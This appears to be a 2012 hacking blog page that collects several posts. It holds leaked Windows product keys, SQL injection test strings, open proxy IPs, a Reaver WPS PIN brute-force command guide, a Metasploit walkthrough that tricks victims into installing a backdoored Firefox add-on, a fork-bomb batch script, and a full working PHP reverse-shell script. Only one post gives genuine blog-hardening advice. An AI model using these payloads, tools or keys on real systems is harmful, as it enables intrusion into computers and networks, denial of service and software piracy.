7|Starter|Toshiba|TGBKB-9KBGJ-3Y3J6-K8M2F-J2HJQ
7|Starter|Viliv|7W842-2HCPJ-BC3MJ-B79K6-TD2HQ

Share your Comments here.. 
Join our blog for mail updates..

Sunday, June 17, 2012

Prevent your website from SQL Injection vulnerability



MySQL Injection is a type of attack where an end user may hack your database from his browser itself. Here my main attempt will sql injection prevention.

What will be your SQL statement to retrieve a username and a password when we login to your website?

In most cases this will be like

 SELECT 1 FROM user WHERE username=’ABC’ AND password=’1234’; 

Now think if a user fills data something like this:
username=  ABCD
password=  ‘ or ’1′=’1

Now check your SQL query. It has changed now.
 
SELECT 1 FROM user WHERE username=’ABCD’ AND password= ’’ OR ‘1’ = ’1’ ;

Now with this query a user with an invalid username and without a password can make an unusual entrance to your private areas.

Before 2005 almost 50% website’s admin panel were hacked with this approach.
Even in 2012 it is still active and lots of websites are hacked. This is a simple example of SQL injections. There are lots of predefined SQL injection codes readily available online. You can create your own.

Even a normal internet surfer can break down your security with such a code.

To get rid of this issue we can make our Login QUERY statement something like this.
You need to make another function which will escape all the special characters form the user data if you are using PHP then you can use mysql_real_escape_string function which adds a backslashe to the following characters: \x00, \n, \r, \, ‘, ” and \x1a.

$query = sprintf("SELECT 1 FROM users WHERE user='%s' AND 
password='%s'",mysql_real_escape_string($user),mysql_real_escape_string($password));

However this will only save you from incorrect login but what if an authorized user is doing some trick to get additional things from your website.
I will suggest making a function which works globally throughout the website.
Like this one. The following codes let you discover the ways to get rid of every possible SQL Injection attack
.



Now we need to call check_form_submission in each form submission. Please try to understand the logic behind the code. It will check for all the GET and POST variables. You can modify the code accordingly to variable types. But this is OK at all. Let me know if you have discovered something or want to share your experience with me.

Here is a list of SQL Injection Strings you can try to test:
“1 OR 1=1″ 
“1\’ OR \’1\’=\’1″
“1\’1″
“1 EXEC XP_”
“1 AND 1=1″
“1\’ AND 1=(SELECT COUNT(*) FROM tablenames); –”
“1 AND USER_NAME() = \’dbo\’”
“\\\’; DESC users; –”
“1\\\’1″
“1\’ AND non_existant_table = \’1″
“\’ OR username IS NOT NULL OR username = \’”
“1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\’U\’), 1, 1))) > 116″
“1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \’U\’ –”
“1 UNI/**/ON SELECT ALL FROM WHERE”
“%31%27%20%4F%52%20%27%31%27%3D%27%31″
“1′ OR ’1′=’1″  

Proxy lists for India



Proxy's for India-

Below you will find the list of proxy IP addresses and ports only


Proxy IPProxy port
                                                                 
202.65.158.179        8080
59.161.254.105        80
61.16.234.188        80
111.119.199.82         8080
118.91.234.77        8080
182.71.214.229        3128
202.129.240.37        8080
202.159.223.52        3128
202.164.53.124        8080
218.248.4.101        8080      














      

6 Ways to Protect Your Blog from being Hacked



1. Have Strong Passwords, and Change them Regularly-

The first step you should take to protect your blog from being hacked is to have a password that is very strong. You’ll be surprised at how simple the password some people use is, and they end up complaining when they’re hacked.

Make sure your password doesn’t contain your name, address, or even date of birth. Use something nobody can ever associate with you, and don’t ever talk about your password to anybody. Also make sure you change your password regularly; like every 3-6 months, and you will be able to protect yourself from being trailed by a hacker.

2. Have More than One Admin Account-

It could be 3 or more, and it could be only two. It is very important not to have just one admin account. The reason for this is that the first thing an hacker will do once they hack your blog is to change your details, and you can protect yourself by taking control through your other admin account.

Another thing you should realize is that this technique is just as dangerous as it is helpful, so make sure you prepare yourself for this; the more admin accounts you have on your blog, the more routes an hacker can take to get to you. To protect yourself from this, make sure the username and passwords for all your admin accounts are so unique and different, so that it will be difficult for any hacker to take control upon getting to your blog.

3. Install Plugin that Monitors Your Files and Notify You of Changes Immediately-

You can also tell your hosting to help you configure your server to notify you in case there is any change in any of your files at any time, or you can look for a plugin that makes this easy.

A lot of little changes happen to our blog every day, but the reality is that some of them shouldn’t be. It is important for you to make sure you don’t come to know about any of these changes lately, so make sure you regularly monitor your sever and wordpress installation for any changes.

4. Scan Every Theme and Plugin You Want to Install-


This is especially important if you download your themes and plugins from other websites online, or if you’re using cracked plugins and themes. You never know when a sleazy programmer will put a little code in your theme or plugin, or when that cracked software you’re downloading will be virus infected.
Don‘t just wait to get hacked before you realize this, so make sure you scan every theme and plugin you want to install on a regular basis; scan them with your own antivirus before you install them.

5. Back up Your Blog Regularly-

Don’t ever miss a day, because you never know when your blog will be hacked. One thing I have noticed in the hacking world is that, no matter how secure, there is nothing that cannot be hacked. Of course, you can invest time and effort into making your blog very secure, and you can even hire an expert to take care of this aspect. But the reality is, if a group of hackers dedicate their efforts to bring down your blog, it will only last a few hours at best.

The best thing to do in a situation like this is to back up your blog regularly. Have at least 2 plugins/
software that backs up your entire blog, and make sure you check regularly to ensure your files are properly backed up.

6. Use Different Passwords for Every Aspect of Your Website-

For every webmaster you can have up to 3 different username and passwords for your hosting, and these 3 passwords can make it easy for you to recover your website in the case that you’re hacked.

*. The first password is for your hosting account; where you can see tickets, pay for hosting, and change your Cpanel details.

*. The second password is for your Cpanel; where you can access various parts of your website and make changes directly to your blog.

*. The third password is for your wordpress installation in itself; where you can add new posts, reply to comments, create new accounts, and update your blog directly.

The deadliest mistake any blogger can make is to make all 3 passwords the same, and you can protect yourself to an extent by making these passwords different.

You should also make sure all 3 usernames are different, and try getting your web host to help you change your details from the default one to something more secure..
 
Share your Comments.. Join our Blog...

Friday, June 15, 2012

Reaver-wps WPA/WPA2 Cracking




So whats Reaver-

Reaver performs a brute force attack against an access point's WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP's wireless settings can be reconfigured. While Reaver does not support reconfiguring the AP, this can be accomplished with wpa_supplicant once the WPS pin is known. 

Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a check sum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values. 

The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a check sum. 

Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number. 


Lets Begin-

First Download Reaver & it is only supported on the Linux platform, requires the libpcap and libsqlite3 libraries, and can be built and installed by running: 

$ ./configure
$ make
# make install
To remove everything installed/created by Reaver:
# make distclean

USAGE-
Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP:


 # reaver -i mon0 -b 00:01:02:03:04:05 

The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically identified by Reaver, unless explicitly specified on the command line: 

 # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys 

By default, if the AP switches channels, Reaver will also change its channel accordingly. However, this feature may be disabled by fixing the interface's channel: 

# reaver -i mon0 -b 00:01:02:03:04:05 --fixed  

The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second): 

  # reaver -i mon0 -b 00:01:02:03:04:05 -t 2 

The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:  

# reaver -i mon0 -b 00:01:02:03:04:05 -d 0 

Some APs will temporarily lock their WPS state, typically for five minutes or less, when "suspicious" activity is detected. By default when a locked state is detected, Reaver will check the state every 315 seconds (5 minutes and 15 seconds) and not continue brute forcing pins until the WPS state is unlocked. This check can be increased or decreased to any non-negative integer value:   

# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250 

For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:   

# reaver -i mon0 -b 00:01:02:03:04:05 -vv 

The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This timeout period can be set manually if necessary (max timeout period is 1 second):

# reaver -i mon0 -b 00:01:02:03:04:05 -T .5  

Some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout is reached, it is treated the same as a NACK by default. However, if it is known that the target AP sends NACKS (most do), this feature can be disabled to ensure better reliability. This option is largely useless as Reaver will auto-detect if an AP properly responds with NACKs or not:

# reaver -i mon0 -b 00:01:02:03:04:05 --nack 

While most APs don't care, sending an EAP FAIL message to close out a WPS session is sometimes necessary. By default this feature is disabled, but can be enabled for those APs that need it: 
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate  
When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:  
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
  
Drop your Comments... Don't Forget to join our blog..
  

Thursday, June 14, 2012

Hacking Windows 7 & Xp with Fake Firefox add-on (XPI) : Metasploit Tutorials



>What am i doing?
1. Create a fake firefox extension with Metasploit that creates a backdoor from the victim system.
2. Trick users into installing the add-on
3. Break into the Target Machine.

>Pre-configuration:
*. As usual, you have to set up two virutal machines(VM ) in your virtualbox namely "Target"and "Attacker".
*. Install the windows xp or 7 in the Target VM.
*. Install the Backtrack in the Attacker VM.

>Part I: Update the Metasploit-

As we are going to use the latest module, you are advised to update the Metasploit modules. Don't know how to do this? No need to worry!
*. Open the Terminal
*. type msfupdate
*. This will update the Metasploit with latest modules..

>Part II: Configuring settings in Metasploit for the fake-addon exploit-

*Step 1:
Open the Terminal and type " msfconsole " to get the Metasploit console.
*Step 2:
Type " use exploit/multi/browser/firefox_xpi_bootstrapped_addon " in the console.
*Step 3:
Now we have to know the list of settings available for this exploit module. In order to get the list, you can type "show options" in the console.

*Step 4: Configurations-

Let us configure the setting for the exploit.
type the commands..

Command: set addonname fake

Details: Name for the fake add-on. you can change the "fake" to any name.

Command: set SRVHOST 192.168.56.11

Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set SRVPORT 80

Details: Our server is going to be accessed via the port 80(default port)

Command: set URIPATH fakeEx

Details: The path in which the fake add-on will be available to download. For ex: http://192.1xx.5x.xx/fakeaddon

Command: set LHOST 192.168.56.11

Details: Here the 192.168.56.11 is the ip of Backtrack. You can get this ip by simply typing the "ifconfig" in the terminal.

>Step 5: Payload-

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:

set payload windows/meterpreter/reverse_tcp

>Part III: Social Engineering Attack-

Successfully configured the settings for the exploit, what else? let us launch the exploit.

Type "exploit" in the console.
Now the exploit is started. Our fake add-on is available at,"http://192.1xx.5x.xx/fakeaddon".

Once victim visit the link, it will ask user to install the add-on in order to view the page. Once user install the add-on, the system will be backdoor-ed.

Now , You can control the victim system from meterpreter..

How to make a Fork Bomb (rabbit virus)



Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software..

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing... I am not responsible if you kills your computer or somebody else computer with or without permission..

Now that we have that out a the way here we go...
Blocks of code should be set as style "Formatted" like this.

Code: .bat

:s
START %0
GOTO :s

>Run this boy from a flash drive so you can see how it works and pull the drive to stop it..

LIKE AND COMMENT..

Back connect Shell | Reverse Shell in PHP



Back Connect Shell also known as Reverse Shell is a Piece of Code which is used to Host a Shell on the Server or the Victim, But instead of sitting there and listening for connections (As in the Case of Bind Shell) it rather Connects Back to the Attacker Machine.

In this tutorial i’ll be making a Back Connect Shell in PHP-

Code-
back-connect.php
>Code: php

<?php
/*********************
@@author : Kumaran
@@facebook : facebook.com/hackersgrp
@@Email : mail4hackersgrp@gmail.com
********************/
ini_set ( 'max_execution_time' , 0 ) ;
?>
<html>
<head>
<title>Back Connect Shell -- PHP</title>
</head>
<body>
<h1>Welcome to Back Connect Control Panel </h1>
<p> Fill in the form Below to Start the Back Connect Service </p>
<?php
if ( isset ( $_GET [ 'port' ] ) &&
isset ( $_GET [ 'ip' ] ) &&
$_GET [ 'port' ] != "" &&
$_GET [ 'ip' ] != ""
)
{
echo "<p>The Program is now trying to connect!</p>" ;
$ip = $_GET [ 'ip' ] ;
$port = $_GET [ 'port' ] ;
$sockfd = fsockopen ( $ip , $port , $errno , $errstr ) ;
if ( $errno != 0 )
{
echo "<font color='red'><b>$errno</b> : $errstr</font>" ;
}
else if ( ! $sockfd )
{
$result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>" ;
}
else
{
fputs ( $sockfd ,
" \n ================================================================= \n
Back Connect in PHP \n
Coded by kumaran \n
@@author : kumaran
@@facebook : facebook.com/hackersgrp
@@Email : mail4hackersgrp@gmail.com
\n =================================================================" ) ;
$pwd = shell_exec ( "pwd" ) ;
$sysinfo = shell_exec ( "uname -a" ) ;
$id = shell_exec ( "id" ) ;
$dateAndTime = shell_exec ( "time /t & date /T" ) ;
$len = 1337 ;
fputs ( $sockfd , $sysinfo . " \n " ) ;
fputs ( $sockfd , $pwd . " \n " ) ;
fputs ( $sockfd , $id . " \n \n " ) ;
fputs ( $sockfd , $dateAndTime . " \n \n " ) ;
while ( ! feof ( $sockfd ) )
{
$cmdPrompt = "(Shell)[$]>" ;
fputs ( $sockfd , $cmdPrompt ) ;
$command = fgets ( $sockfd , $len ) ;
fputs ( $sockfd , " \n " . shell_exec ( $command ) . " \n \n " ) ;
}
fclose ( $sockfd ) ;
}
}
else
{
?>
<table align= "center" >
<form method= "GET" >
<td>
<table style= "border-spacing: 6px;" >
<tr>
<td>Port</td>
<td>
<input style= "width: 200px;" name= "port" value= "31337" />
</td>
</tr>
<tr>
<td>IP </td>
<td><input style= "width: 100px;" name= "ip" size= '5' value= "127.0.0.1" />
</tr>
<tr>
<td>
<input style= "width: 90px;" class = "own" type= "submit" value= "Connect back:D!" />
</td>
</tr>

</table>
</td>
</form>
</tr>
</table>
<p align= "center" style= "color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
}
?>

Its as easy as a couple of clicks to make it work and to use..!

Dont forget to Like and comment..

 
Design by Secure Hackers